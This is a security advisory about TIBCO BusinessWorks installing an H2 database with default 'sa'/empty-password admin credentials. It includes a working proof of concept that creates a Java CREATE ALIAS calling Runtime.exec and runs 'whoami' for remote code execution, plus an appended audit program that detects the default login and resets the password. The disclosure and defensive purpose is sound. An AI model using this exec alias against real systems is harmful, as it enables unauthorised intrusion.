usd-2021-0012 | TIBCO ActiveMatrix BusinessWorks


Advisory ID: usd-2021-0012
Affected Product: TIBCO BusinessWorks
Affected Version: 6.5.0 hotfix 10 build V159
Vulnerability Type: CWE-521: Weak Password Requirements
Security Risk: Critical
Vendor URL: https://www.tibco.com/
Vendor Status: addressed via guidance

Description

TIBCO ActiveMatrix BusinessWorks installs an H2 database by default. The admin user of this database has default credentials. The H2 database allows its users to create and execute arbitrary Java functions.

Default credentials can often be found in configuration files or official manuals. Additionally, they may be looked up in other publicly available sources. Leaving default credentials in active use is particularly dangerous because it provides attackers with a trivial entry point and does not require further technical understanding to get access to the system.

A TIBCO BusinessWorks installation features a "TIBCO Enterprise Administrator" (TEA). It seems that the default installation of this admin interface creates the vulnerable H2 service with default administrative credentials. H2 admins have remote code execution by design. The issue was published as CVE-2018-10054 but was never fixed.

Proof of Concept (PoC)

1. Identify the service running an H2 database server. In the test environment it listened on port 23492, but the port may differ on other systems.

2. Use a local instance of the H2 console to log in to the database.

3. In the login panel of the H2 console, use the following settings:

  • Driver Class: org.h2.Driver
  • JDBC URL: jdbc:h2:tcp://IP:PORT/~/test
  • User Name: sa
  • Password: (empty)
  • Click connect.

4. The UI allows running SQL statements. Create an alias, which is nothing other than a Java method:

create alias exec as '
String exec(String cmd) throws java.io.IOException, java.lang.InterruptedException {
    java.lang.Process process = java.lang.Runtime.getRuntime().exec(cmd);
    StringBuilder output = new StringBuilder();
    java.io.BufferedReader reader = new java.io.BufferedReader(
        new java.io.InputStreamReader(process.getInputStream()));
    String line;
    while ((line = reader.readLine()) != null) {
        output.append(line + "\n");
    }
    int exitVal = process.waitFor();
    if (exitVal == 0) {
        return output.toString();
    }
    return "Error";
}
';

5. Call the alias with the following SQL statement:

call exec("whoami")

This returns:

tibco

Fix

The installer should require the user to set new credentials for the H2 admin user during installation, instead of shipping a known default.
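As an added example (not part of this advisory and not TIBCO or H2 project code), the following audit program checks an H2 TCP endpoint for the default login described in step 3, lists source-defined aliases left behind by the kind of CREATE ALIAS statement shown in step 4, and optionally replaces the empty password as the Fix section recommends. It assumes the H2 1.4.x INFORMATION_SCHEMA layout, the h2 jar on the classpath, and the port from the test environment; the class name and argument handling are hypothetical.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

public class H2DefaultCredentialAudit {
    /** True when the server accepts the default login documented in the advisory (sa, empty password). */
    static boolean acceptsDefaultCredentials(String jdbcUrl) {
        try (Connection ignored = DriverManager.getConnection(jdbcUrl, "sa", "")) {
            return true;
        } catch (SQLException e) {
            return false; // login rejected: the default credentials have been changed
        }
    }

    /** Names of source-defined aliases (CREATE ALIAS ... AS '<java>'); one left behind is an indicator
        that the alias-based code execution from the PoC was used. Assumes the H2 1.4.x schema. */
    static List<String> sourceDefinedAliases(Connection conn) throws SQLException {
        List<String> names = new ArrayList<>();
        String sql = "SELECT ALIAS_NAME FROM INFORMATION_SCHEMA.FUNCTION_ALIASES WHERE SOURCE IS NOT NULL";
        try (Statement st = conn.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            while (rs.next()) {
                names.add(rs.getString("ALIAS_NAME"));
            }
        }
        return names;
    }
    /** Replaces the empty SA password. ALTER USER takes no bind parameters in H2, so the literal is
        embedded; doubling single quotes keeps it a string. The TEA configuration holding the H2
        credentials must be changed to match (assumption about the deployment). */
    static void setSaPassword(Connection conn, String newPassword) throws SQLException {
        String literal = newPassword.replace("'", "''");
        try (Statement st = conn.createStatement()) {
            st.execute("ALTER USER SA SET PASSWORD '" + literal + "'");
        }
    }
    public static void main(String[] args) throws SQLException {
        // Port 23492 is the one seen in the advisory's test environment; pass the real URL as args[0].
        String url = args.length > 0 ? args[0] : "jdbc:h2:tcp://127.0.0.1:23492/~/test";
        if (!acceptsDefaultCredentials(url)) { System.out.println("OK: sa/empty login rejected"); return; }
        System.out.println("FINDING: H2 accepts user sa with an empty password");
        try (Connection conn = DriverManager.getConnection(url, "sa", "")) {
            System.out.println("Source-defined aliases: " + sourceDefinedAliases(conn));
            if (args.length > 1) { setSaPassword(conn, args[1]); System.out.println("SA password set"); }
        }
    }
}
```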


Timeline

  • 2021-03-03: This vulnerability was identified by Konstantin Samuel.
  • 2021-04-15: Vulnerability information transmitted to vendor.
  • 2021-06-07: Vendor informs us of ongoing triage and its Fair Disclosure policy.
  • 2021-07-22: Vendor addressed this issue via a public knowledge base article.
  • 2021-08-31: Security advisory released by usd AG.

Credits

This security vulnerability was found by Konstantin Samuel of usd AG.